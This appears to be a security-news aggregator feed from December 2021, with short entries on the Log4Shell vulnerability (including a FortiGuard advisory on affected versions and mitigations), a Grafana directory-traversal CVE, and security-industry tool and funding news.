2021-12-15 14:00:00 | Shoreline.io launches online notebooks for site reliability engineers (lien direct) | This automated remediation tool creates online versions of runbooks and can record debug sessions to capture best practices. | Tool | ||
|
2021-12-15 11:47:36 | Problematic Log4j Functionality Disabled as More Security Issues Come to Light (lien direct) | Developers of the widely used Apache Log4j Java-based logging tool have disabled problematic functionality as more security issues have come to light. | Tool | ||
|
2021-12-15 09:40:31 | Web Browsing Security Firm Guardio Raises $47 Million (lien direct) | Web browsing protection tool Guardio on Tuesday announced that it came out of bootstrap mode with $47 million in funding. Guardio's first ever investment round was led by Tiger Global. Cerca Partners, Emerge, Samsung Next, Union, and Vintage also participated. | Tool | ||
|
2021-12-14 14:11:35 | Log4Shell Tools and Resources for Defenders - Continuously Updated (lien direct) | 
The widely used Apache Log4j Java-based logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including to deliver various types of malware.
|
Tool Vulnerability | ||
|
2021-12-13 09:00:42 | Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228) (lien direct) | FortiGuard Labs is aware of a remote code execution vulnerability in Apache Log4j. Log4j is a Java based logging audit framework within Apache. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability where a remote attacker can leverage this vulnerability to take full control of a vulnerable machine.This vulnerability is also known as Log4shell and has the CVE assignment (CVE-2021-44228). FortiGuard Labs will be monitoring this issue for any further developments.What are the Technical Details?Apache Log4j2 versions 2.14.1 and below Java Naming and Directory Interface (JNDI) features do not protect against attacker controlled LDAP and other JNDI related endpoints. A remote code execution vulnerability exists where attacker controlled log messages or log message parameters are able to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.What Versions of Software are Affected?Apache Log4J versions 2.0-beta9 to 2.14.1 are affected.Is there a Patch or Security Update Available?Yes, moving to version 2.15.0 mitigates this issue. Further mitigation steps are available from Apache as well. Please refer to the "Apache Log4j Security Vulnerabilities" in the APPENDIX for details.What is the CVSS Score?10 (CRITICAL)What is Exactly Apache Log4j?According to Apache:Log4j is a tool to help the programmer output log statements to a variety of output targets. In case of problems with an application, it is helpful to enable logging so that the problem can be located. With log4j it is possible to enable logging at runtime without modifying the application binary. The log4j package is designed so that log statements can remain in shipped code without incurring a high performance cost. It follows that the speed of logging (or rather not logging) is capital.At the same time, log output can be so voluminous that it quickly becomes overwhelming. One of the distinctive features of log4j is the notion of hierarchical loggers. Using loggers it is possible to selectively control which log statements are output at arbitrary granularity.What is the Status of Protections?FortiGuard Labs has IPS coverage in place for this issue as (version 19.215):Apache.Log4j.Error.Log.Remote.Code.ExecutionWhile we urge customers to patch vulnerable systems as soon as possible, FortiEDR monitors and protects against payloads delivered by exploitation of the vulnerability. The picture below demonstrates blocking of a PowerShell payload used as part of CVE-2021-44228 exploitation:Detection of exploitable systems is possible via FortiEDR threat hunting by searching for loading of vulnerable log4j versions. This is an example of loading a vulnerable log4j library by a Apache Tomcat Server:Any Suggested Mitigation?According to Apache, the specific following mitigation steps are available:In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to "true." For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.classFortiGuard Labs recommends organizations affected by CVE-2021-44228 to update to the latest version of 2.15.0 immediately. Apache also recommends that users running versions 1.0 or lower install version 2.0 or higher as 1.0 has reached end of life in August 2015 for Log4j to obtain security updates. Binary patches are never provided and must be compiled. For further details, refer to the "Apache Log4j Security Vulnerabilities" in the APPENDIX.If this is not possible, various counter measures such as isolating machines behind a firewall or VPN that are public facing is recommended. | Tool Vulnerability Threat | ★★★★★ | |
 |
2021-12-12 05:28:18 | Microsoft\'s Response to CVE-2021-44228 Apache Log4j 2 (lien direct) | Published on: 2021 Dec 11 SUMMARY Microsoft is investigating the remote code execution vulnerability (CVE-2021-44228) related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. As we and the industry at large continue to gain a deeper understanding of the impact of this threat, we will publish technical … Microsoft's Response to CVE-2021-44228 Apache Log4j 2 Read More » | Tool Vulnerability | ||
|
2021-12-10 21:15:09 | CVE-2021-43815 (lien direct) | Grafana is an open-source platform for monitoring and observability. Grafana prior to versions 8.3.2 and 7.5.12 has a directory traversal for arbitrary .csv files. It only affects instances that have the developer testing tool called TestData DB data source enabled and configured. The vulnerability is limited in scope, and only allows access to files with the extension .csv to authenticated users only. Grafana Cloud instances have not been affected by the vulnerability. Versions 8.3.2 and 7.5.12 contain a patch for this issue. There is a workaround available for users who cannot upgrade. Running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability. The proxy will have to also be able to handle url encoded paths. | Tool Vulnerability |
To see everything:
Our RSS (filtrered)
